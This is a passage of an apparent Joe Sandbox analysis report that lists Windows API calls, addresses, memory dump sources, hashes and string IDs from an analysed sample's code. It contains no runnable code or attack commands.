                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518CA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518D1
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007518DA
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518E1
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007518ED
                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 007518F4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: GetProcessHeap.KERNEL32(00000008,007514FD,?,00000000,?,007514FD,?), ref: 00751AED
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007514FD,?), ref: 00751AF4
                                                                                                                                                                                                                                                                                • Part of subcall function 00751ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007514FD,?), ref: 00751B03
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2f31963fcc261292c319f69e81d5fedbfe153905f042bec52b11367e1216ae85
                                                                                                                                                                                                                                                                              • Instruction ID: f1b7adc08a9bb74f09ac7f463f7880a27f9514550d7c6c0f27f9701ce17828bb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f31963fcc261292c319f69e81d5fedbfe153905f042bec52b11367e1216ae85
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F714071D00209AFDF20DFA5DC48FEEBBB9BF04322F548115E915A6190DB799D09CB60
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077CF1D
                                                                                                                                                                                                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0078DCD0,00000000,?,00000000,?,?), ref: 0077CFA4
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0077D004
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077D054
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077D0CF
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0077D112
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0077D221
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0077D2AD
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077D2E1
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077D2EE
                                                                                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0077D3C0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                                                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                              • API String ID: 9721498-966354055
                                                                                                                                                                                                                                                                              • Opcode ID: 9992aa21a6d2f747b31a4bbce2373d9ffcf8c8d8266650c25a1c63169dc6a5be
                                                                                                                                                                                                                                                                              • Instruction ID: d73a5ea2fbe9c4c3663b2158653185440aaed7045c634d271e812174f30d329b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9992aa21a6d2f747b31a4bbce2373d9ffcf8c8d8266650c25a1c63169dc6a5be
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9127C356042059FCB24DF14C885A2ABBF6FF88754F14849CF98A9B3A2CB35ED41CB85
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00781462
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078149D
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007814F0
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00781526
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007815A2
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078161D
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                                • Part of subcall function 00753535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00753547
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                                                                                                                              • API String ID: 1103490817-4258414348
                                                                                                                                                                                                                                                                              • Opcode ID: 5485671be5edf1b5a3ff69b3e3ea7eca7007698b3a01405d178464b01a8f1b33
                                                                                                                                                                                                                                                                              • Instruction ID: 0fdaaae105f2373442b5feb0938aed6449ed654d79785d9d82fca01ac8d8c69b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5485671be5edf1b5a3ff69b3e3ea7eca7007698b3a01405d178464b01a8f1b33
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73E1AE71644301CFCB14EF24C45096AB7EAFF94314B54896DF8969B3A2DB38ED46CB81
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                                                                                                              • API String ID: 1256254125-909552448
                                                                                                                                                                                                                                                                              • Opcode ID: 91474e1488deb589c935a21c80da65a7b4728d699abd1af2efd26b861441855f
                                                                                                                                                                                                                                                                              • Instruction ID: 5383e71bac1b9bc1d39d2750e113b9692d468e9d52417ab7886c369a6efc4b05
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91474e1488deb589c935a21c80da65a7b4728d699abd1af2efd26b861441855f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D471E57260015A8BCF309E7CC9506FA33B5AF607E8B258128FC5E97294EA3DDD55C3A1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DB5
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DC9
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788DEC
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00788E0F
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00788E4D
                                                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00786691), ref: 00788EA9
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788EE2
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00788F25
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788F5C
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 00788F68
                                                                                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00788F78
                                                                                                                                                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,00786691), ref: 00788F87
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00788FA4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00788FB0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                                                                                                                              • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                              • API String ID: 799131459-1154884017
                                                                                                                                                                                                                                                                              • Opcode ID: 12fea1b2c79048f8d6815c9982cc8285c5c3476401dc7429a56a9158be609fc6
                                                                                                                                                                                                                                                                              • Instruction ID: b659ac7c8daee47d41e27bbb9cf7cd4fe42890c51622914d396be68cdd11885a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12fea1b2c79048f8d6815c9982cc8285c5c3476401dc7429a56a9158be609fc6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F610471980219FEEB64EF64CC45BBE77A9BF08B10F508106F914D60D1DB78AD90CBA0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 0076493D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764948
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0076499F
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007649DD
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?), ref: 00764A1B
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764A63
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764A9E
                                                                                                                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764ACC
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                              • API String ID: 1839972693-4113822522
                                                                                                                                                                                                                                                                              • Opcode ID: 209b1ff6d43a8071e6e3e0762bec91d93153df488488e57bd156f6f6c9fb0643
                                                                                                                                                                                                                                                                              • Instruction ID: 86c777687918c33275fcf604a2b03172f5ec78110d24fb7ed46eea5d9556665a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 209b1ff6d43a8071e6e3e0762bec91d93153df488488e57bd156f6f6c9fb0643
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 317102725083059FC750EF24C84097BBBE9EF94758F00892DF89697261EB39ED45CB91
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 00756395
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007563A7
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007563BE
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 007563D3
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007563D9
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 007563E9
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 007563EF
                                                                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00756410
                                                                                                                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0075642A
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00756433
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075649A
                                                                                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 007564D6
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 007564DC
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 007564E3
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0075653A
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00756547
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0075656C
                                                                                                                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00756596
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 895679908-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00770884
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0077088F
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0077089A
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 007708A5
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 007708B0
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 007708BB
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 007708C6
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 007708D1
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 007708DC
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 007708E7
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 007708F2
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 007708FD
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00770908
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00770913
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 0077091E
                                                                                                                                                                                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00770929
                                                                                                                                                                                                                                                                              • GetCursorInfo.USER32(?), ref: 00770939
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0077097B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3215588206-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen
                                                                                                                                                                                                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$k{
                                                                                                                                                                                                                                                                              • API String ID: 176396367-4172269881
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00710436
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: InitializeCriticalSectionAndSpinCount.KERNEL32(007C170C,00000FA0,3B98D803,?,?,?,?,00732733,000000FF), ref: 0071048C
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00732733,000000FF), ref: 00710497
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00732733,000000FF), ref: 007104A8
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007104BE
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007104CC
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007104DA
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710505
                                                                                                                                                                                                                                                                                • Part of subcall function 0071045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710510
                                                                                                                                                                                                                                                                              • ___scrt_fastfail.LIBCMT ref: 00710457
                                                                                                                                                                                                                                                                                • Part of subcall function 00710413: __onexit.LIBCMT ref: 00710419
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00710492
                                                                                                                                                                                                                                                                              • SleepConditionVariableCS, xrefs: 007104C4
                                                                                                                                                                                                                                                                              • InitializeConditionVariable, xrefs: 007104B8
                                                                                                                                                                                                                                                                              • kernel32.dll, xrefs: 007104A3
                                                                                                                                                                                                                                                                              • WakeAllConditionVariable, xrefs: 007104D2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                              • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CharLowerBuffW.USER32(00000000,00000000,0078DCD0), ref: 00764F6C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764F80
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00764FDE
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00765039
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00765084
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007650EC
                                                                                                                                                                                                                                                                                • Part of subcall function 0070FD52: _wcslen.LIBCMT ref: 0070FD5D
                                                                                                                                                                                                                                                                              • GetDriveTypeW.KERNEL32(?,007B7C10,00000061), ref: 00765188
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                              • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BBF8
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC10
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC34
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BC60
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC74
                                                                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0077BC96
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BD92
                                                                                                                                                                                                                                                                                • Part of subcall function 00760F4E: GetStdHandle.KERNEL32(000000F6), ref: 00760F6D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BDAB
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0077BDC6
                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0077BE16
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 0077BE67
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077BE99
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BEAA
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BEBC
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077BECE
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077BF43
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,0078DCD0), ref: 00774B18
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00774B2A
                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0078DCD0), ref: 00774B4F
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,0078DCD0), ref: 00774B9B
                                                                                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028,?,0078DCD0), ref: 00774C05
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000009), ref: 00774CBF
                                                                                                                                                                                                                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00774D25
                                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00774D4F
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
